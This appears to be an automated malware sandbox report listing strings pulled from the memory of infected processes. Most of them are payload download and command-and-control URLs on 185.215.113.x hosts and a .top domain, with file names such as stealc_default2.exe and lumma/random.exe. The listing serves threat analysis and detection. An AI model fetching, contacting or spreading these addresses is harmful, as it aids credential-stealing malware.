Source: axplong.exe, 00000006.00000002.4838480992.0000000001363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php1001
Source: axplong.exe, 00000006.00000002.4838480992.0000000001363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpP1
Source: axplong.exe, 00000006.00000002.4838480992.0000000001363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpUsers
Source: axplong.exe, 00000006.00000002.4838480992.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpWu
Source: axplong.exe, 00000006.00000002.4838480992.0000000001363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpuser
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpl
Source: axplong.exe, 00000006.00000002.4838480992.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000006.00000002.4838480992.0000000001363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/dobre/random.exe
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/dobre/random.exeA
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/dobre/splwow64.exeD
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/dobre/splwow64.exeP
Source: new_v8.exe, 0000001E.00000002.3442416273.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255532935.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/f
Source: new_v8.exe, 0000001E.00000002.3442416273.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255532935.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/iS
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/GOLD1234.exe
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/RDX123456.exe
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/RDX123456.exe=
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/hhnjqu9y.exe
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/new_v8.exe
Source: axplong.exe, 00000006.00000002.4838480992.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/stealc_default2.exe
Source: axplong.exe, 00000006.00000002.4838480992.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/stealc_default2.exe.
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/yxrd0ob7.exe
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/yxrd0ob7.exe3
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/l
Source: axplong.exe, 00000006.00000002.4838480992.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: axplong.exe, 00000006.00000002.4838480992.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe5c7cf182
Source: axplong.exe, 00000006.00000002.4838480992.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exef5c7cedh
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/lumma/random.exe
Source: new_v8.exe, 0000001E.00000002.3442416273.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000002.3446426303.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000002.3411095084.000000000097A000.00000004.00000010.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255532935.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000002.3415654770.0000000000C3F000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255308396.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4470400010.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4353004958.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4506037697.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4364749039.000000000055A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: new_v8.exe, 0000001E.00000002.3442416273.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255532935.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeC:
Source: new_v8.exe, 0000001E.00000002.3442416273.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255532935.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeP
Source: 3288f0a855.exe, 00000028.00000003.4353004958.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4506037697.0000000000D64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exee
Source: 3288f0a855.exe, 00000028.00000003.4353004958.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4506037697.0000000000D64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeedU
Source: 3288f0a855.exe, 00000028.00000003.4353004958.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4506037697.0000000000D64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeex
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/rosoft
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ta
Source: stealc_default2.exe, 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000003.2848424419.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php.dll
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php/
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php1
Source: stealc_default2.exe, 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php2
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php:
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php=
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpdll
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpe
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpf
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phplg
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phplr
Source: stealc_default2.exe, 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phption:
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpwser
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpy
Source: stealc_default2.exe, 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/freebl3.dll
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/freebl3.dllC
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dll
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll3
Source: stealc_default2.exe, 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dll
Source: stealc_default2.exe, 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dllof
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllG
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll6592c03206/nss3.dll
Source: stealc_default2.exe, 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.172fb6c2cc8dce150a.phption:
Source: RegAsm.exe, 00000024.00000002.4811775554.0000000001649000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/
Source: RegAsm.exe, 00000024.00000002.4842069839.0000000003FC7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.4811775554.0000000001621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php
Source: RegAsm.exe, 00000024.00000002.4811775554.000000000166D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php&
Source: RegAsm.exe, 00000024.00000002.4811775554.0000000001621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php;
Source: RegAsm.exe, 00000024.00000002.4811775554.0000000001649000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.4811775554.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.4811775554.0000000001621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php?scr=1
Source: RegAsm.exe, 00000024.00000002.4811775554.0000000001649000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php?scr=1#
Source: RegAsm.exe, 00000024.00000002.4811775554.0000000001621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php?scr=1hbWU9ImRhdGEiOyBmaWxlbmFtZT0iC
Source: RegAsm.exe, 00000024.00000002.4811775554.000000000166D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpL
Source: RegAsm.exe, 00000024.00000002.4842069839.0000000003FC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpR
Source: RegAsm.exe, 00000024.00000002.4811775554.0000000001621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpS~
Source: RegAsm.exe, 00000024.00000002.4811775554.0000000001621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php_~
Source: RegAsm.exe, 00000024.00000002.4830635244.0000000002F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpg
Source: RegAsm.exe, 00000024.00000002.4811775554.000000000166D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpj
Source: RegAsm.exe, 00000024.00000002.4811775554.0000000001649000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpncoded
Source: RegAsm.exe, 00000024.00000002.4830635244.0000000002F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpv
Source: RegAsm.exe, 00000024.00000002.4811775554.000000000166D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpz
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/D
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000009.00000003.3406068969.0000000000913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/Dem7kTu/index.php
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/Dem7kTu/index.php&
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000009.00000003.3406068969.0000000000913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/Dem7kTu/index.php061101
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/Dem7kTu/index.php6/Dem7kTu/index.php
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/Dem7kTu/index.phpI
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/Dem7kTu/index.phpf
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/Dem7kTu/index.phpj
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/Dem7kTu/index.phpl
Source: Gxtuum.exe, 00000009.00000003.3406068969.0000000000913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/Dem7kTu/index.php~
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/JavUmar.exe
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/JavUmar.exe.
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/Offnewhere.exe
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/ViewSizePreferences.SourceAumid01
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000009.00000003.3406068969.0000000000913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/stail.exe
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/ta
Source: Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/u
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: new_v8.exe, 0000001E.00000003.3045023186.0000000003C41000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3660238701.00000000054F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: new_v8.exe, 0000001E.00000003.3045023186.0000000003C41000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3660238701.00000000054F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: splwow64.exe, 0000000B.00000003.2833312201.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: splwow64.exe, 0000000B.00000003.2833312201.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: splwow64.exe, 0000000B.00000002.2888179040.000000000041F000.00000004.00000001.01000000.0000000D.sdmp, splwow64.exe, 0000000B.00000003.2833312201.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: splwow64.exe, 0000000B.00000003.2833312201.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: new_v8.exe, 0000001E.00000003.3045023186.0000000003C41000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3660238701.00000000054F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: axplong.exe, 00000006.00000002.4852244876.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: axplong.exe, 00000006.00000002.4852244876.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: svchost.exe, 00000022.00000002.4899370728.000001D5C2200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: new_v8.exe, 0000001E.00000003.3045023186.0000000003C41000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3660238701.00000000054F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: new_v8.exe, 0000001E.00000003.3045023186.0000000003C41000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3660238701.00000000054F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: new_v8.exe, 0000001E.00000003.3045023186.0000000003C41000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3660238701.00000000054F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: new_v8.exe, 0000001E.00000003.3045023186.0000000003C41000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3660238701.00000000054F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: axplong.exe, 00000006.00000002.4852244876.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: axplong.exe, 00000006.00000002.4852244876.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: svchost.exe, 00000022.00000003.2993225021.000001D5C2400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: stail.exe, 00000025.00000003.3206349513.0000000002300000.00000004.00001000.00020000.00000000.sdmp, stail.exe, 00000025.00000002.4804223341.0000000002088000.00000004.00001000.00020000.00000000.sdmp, stail.tmp, 00000026.00000003.3218349961.0000000003120000.00000004.00001000.00020000.00000000.sdmp, stail.tmp, 00000026.00000002.4794965936.000000000056F000.00000004.00000020.00020000.00000000.sdmp, stail.tmp, 00000026.00000003.3218457618.0000000002210000.00000004.00001000.00020000.00000000.sdmp, stail.tmp, 00000026.00000002.4795778246.0000000002208000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://fsf.org/
Source: JavUmar.exe, 0000001F.00000000.2978282515.0000000000583000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://home.sevjoi17vt.top/FhmmyqGhAphHaXwiJfvm12
Source: JavUmar.exe, 0000001F.00000002.4793320459.0000000000582000.00000004.00000001.01000000.00000012.sdmp, JavUmar.exe, 0000001F.00000003.3280389269.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.sevjoi17vt.top/FhmmyqGhAphHaXwiJfvm1730427912
Source: JavUmar.exe, 0000001F.00000003.3280389269.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.sevjoi17vt.top/FhmmyqGhAphHaXwiJfvm17304279126963
Source: JavUmar.exe, 0000001F.00000003.3280389269.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.sevjoi17vt.top/FhmmyqGhAphHaXwiJfvm1730427912KKd
Source: JavUmar.exe, 0000001F.00000000.2978282515.0000000000583000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://html4/loose.dtd
